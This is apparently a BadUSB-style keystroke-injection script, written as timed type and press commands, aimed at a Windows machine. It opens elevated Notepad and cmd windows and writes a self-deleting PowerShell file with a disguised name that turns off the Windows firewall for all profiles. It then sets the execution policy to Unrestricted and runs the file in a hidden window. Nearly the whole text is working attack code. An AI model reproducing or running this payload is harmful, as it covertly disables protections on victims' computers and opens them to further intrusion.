delay(750  )
delay(1000)
type("powershell Start-Process notepad -Verb runAs")
press("ENTER")
delay(750  )
delay(750  )
press("ENTER")
delay(1000)
type("m ")
delay(1000)
press("DOWN")
press("ENTER")
type("netsh advfirewall set allprofiles state off  ")
type("Remove-Item $MyINvocation.InvocationName ")
press("ENTER")
delay(1000)
type("C:\Windows\config-71267.ps1")
press("ENTER")
delay(1000)
delay(750  )
delay(750  )
type("powershell Start-Process cmd -Verb runAs ")
press("ENTER")
delay(750  )
delay(1000)
type("mode con:cols=14 lines=1 ")
press("ENTER")
delay(750  )
type("m ")
delay(750   )
press("ENTER")
type("powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false")
press("ENTER")
delay(750)
type("powershell.exe -windowstyle hidden -File C:\Windows\config-71267.ps1")
press("ENTER")
